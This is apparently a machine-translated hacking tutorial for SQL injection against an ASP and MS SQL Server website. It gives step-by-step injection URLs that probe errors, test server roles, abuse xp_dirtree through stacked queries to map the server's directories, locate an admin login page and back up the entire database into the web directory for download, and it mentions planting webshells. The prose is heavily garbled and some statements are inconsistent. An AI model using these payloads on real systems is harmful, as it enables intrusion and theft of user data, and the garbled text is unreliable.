SQL injection with unique, novel, mutual statement, has a big breakthrough, of course, it is necessary to make a stake in the two aspects, to achieve a trick, and you will be the core! That is the foundation of SQL injection technology. For a long time, MS SQL has brought great convenience to us with its powerful storage process. Today, the injection technology is mainly based on IIS error and the MS SQL system prompt information, which uses Select to construct a special statement, so that the system is wrong to get What we want more in-depth information, such as explosions, explosions, etc., can you achieve more information? The answer is possible, but there must be a trick! Let's take a step by step to dismantle!
First open the MS SQL query analyzer, enter:
XP_dirtree Applicable Permissions PUBLIC
Statement: exec master.dbo.xp_dirtree 'c: /'
The returned information has two fields Subdirectory, Depth. The Subdirectory field is a character pattern, the depth field is a plastic field. What did you think? Don't worry, we continue!
Statement: CREATE TABLE DIRS (Paths Varchar (100), ID INT)
Role: The statement to build a table is familiar with everyone? But the table built here play a key role! That is, the same is the same as the XP_Dirtree associated, the field is equal, and the type is the next operation. Come, the mystery will be announced!
Statement: INSERT DIRS EXEC MASTER.DBO.XP_DIRTREE 'C: /'
Role: Do you feel strange? Is there any problem in the INSERT statement? NO! The principle is that as long as we build a table definition of the field returned to the store process, it is possible to execute! The difference between the regular insert table (Values) is here, the value we cannot place the storage process, using younger: INSERT DIRTREC MASTER.DBO.XP_DIRTREC MASTER.DBO.XP_DIRTREE 'C: /', the effect of writing tables - Since You can write a table, then we can use unapproved storage processes to step by step to meet the information we want!
Do you understand what you have? I don't understand, I don't have the relationship, I've been in actual combat, the practice is better than theory, then we have come to recruit! Really look! The following uses a website as a base point test, pay attention: The following tests are not SA permission!
Statement: http://www.xxxxx.com/down/list.asp? Id = 1 '
Back: Microsoft Ole DB Provider for SQL Server Error '80040e14'
There are unacceptable quotes before string ''.
/DOWN/List.asp, line 21
Test permission structure:
Statement 1: http://www.xxxxx.com/down/list.asp? Id = 1 and 1 = (select is_srvrolemember ('sysadmin'));
Statement 2: http://www.xxxxx.com/down/list.asp? Id = 1 and 1 = (select is_srvrolemember ('ServerAdmin'));
Statement 3: http://www.xxxxx.com/down/list.asp? Id = 1 and 1 = (Select is_srvrolemember ('setupadmin')); - Statement 4: http://www.xxxxx.com/ Down / List.asp? id = 1 and 1 = (select is_srvrolemember ('securityadmin'));
Statement 5: http://www.xxxxx.com/down/list.asp? Id = 1 and 1 = (select is_srvrolemember ('securityadmin');
Statement 6: http://www.xxxxx.com/down/list.asp? Id = 1 and 1 = (select is_srvrolemember ('diskdmin'));
Statement 7: http://www.xxxxx.com/down/list.asp? Id = 1 and 1 = (select is_srvrolemember ('bulkadmin'));
Statement 8: http://www.xxxxx.com/down/list.asp? Id = 1 and 1 = (select is_srvrolemember ('bulkadmin'));
Statement 9: http://www.xxxxx.com/down/list.asp? Id = 1 and 1 = (SELECT IS_MEMBER ('db_owner'));
With the actual test, only the DB_OWNER statement is returned to the information normally, it can be determined that the permissions owned by the connection database are DB_OWNER (Down database owner), skip the explosive explosion step step, before the black defense is very clear, everyone can look down the smell "How do you want to play inquiry, now we get administrator's table and management form information, further access to two methods: exploding all fields, take management background user password, difficult to find the management rear stage path, it is Physical activity; the other is to upload WebShell directly through Backup, and the difficulty is looking for a web directory.
Handmade suspension management The successful chance of the rear stage path is very low, to use XP_dirtree to get the information we want, the following method may be simple! The first publication, maybe many friends are using, but it is absolutely very good! Let's write the path to the table!
Statement: http:// http://www.xxxx.com/down/list.asp? Id = 1; CREATE TABLE DIRS (Paths Varchar (100), ID INT) -
Return: Normal information! Explain that the construction form is successful! carry on!
Statement: http:// http://www.xxxx.com/down/list.asp? Id = 1; INSERT DIRS EXEC MASTER.DBO.XP_DIRTREE 'C: /' -
Return: Normal information. Note All directories written in the C drive are successful! Cool! The next step is to take a table! Violent.
Statement: http:// http://www.xxxx.com/down/list.asp? Id = 1 and 0 <> (SELECT TOP 1 Paths from DIRS)
Returns: Microsoft OLE DB Provider for SQL Server Errors '80040E07' Converts VARCHAR Value '@ITPub' to quotation when the data type is the column of int.
By exploding the directory name in the table!
Statement: http:// http://www.xxxx.com/down/list.asp? Id = 1 and 0 <> (Select Top 1 Paths from DIRS WHERE PATHS NOT IN ('@ @Etpub')) -
Finally, use the same method to get the web directory in E: / Web, get two options after the web directory, one is to further obtain the website management background, and the other is to obtain WebShell directly through Backup. The success rate of monitoring Bakcup gets WebShell is not too high, let's guess its management background! Here is xp_dirtree, but since XP_dirtree is a directory tree that gets a hard disk partition, we are easily confusing, so come to a layer of layer to get the following directory:
Statement: http:// http://www.xxxx.com/down/list.asp? Id = 1; CREATE TABLE DIRS1 (Paths Varchar (100), ID INT) -
Statement: http:// http://www.xxxx.com/down/list.asp? Id = 1; INSERT DIRS EXEC MASTER.DBO.XP_DIRTREE 'E: / Web' -
Statement: http:// http://www.xxxx.com/down/list.asp? Id = 1 and 0 <> (SELECT TOP 1 Paths from DIRS1) -
After the anti-explosion field, I finally burst into a xxxadminLogin directory. I will know that this directory may be the management background directory we dream of! Press your excitement! We continue:
Statement: http:// http://www.xxxxx.com/down/xxxadminLogin/
Show the entrance! Good! Haha, luck! There are users, passwords, have login URLs, what are you waiting for? Go in, ...
The XP_Dirtree storage process returns only the directory tree, we can't get the file tree. In response to the situation in the root directory of the login entry, there is no way, and relatively, the obtained directory information should be judged according to manual guessment, so it is very strong to obtain the login entry of the management background through XP_Dirtree, which is also very Test personal thinking place.
Going back to the ASP Trojan to get the WebShell by Backup or directly to the current ownership database. Writing Trojans Using Sinking Home Successfully GetWebshell Tools, it is easy to get a Webshell, in order to further obtain member profile, directly backup the entire library to web directory is also a good way!
Statement: http:// http://www.xxxx.com/down/list.asp? Id = 1; declare @a sysname; set @ a = db_name (); Backup Database @a to disk = 'E: / Web / down.bak '; -
Go to download it! Dear friends!嘿嘿.
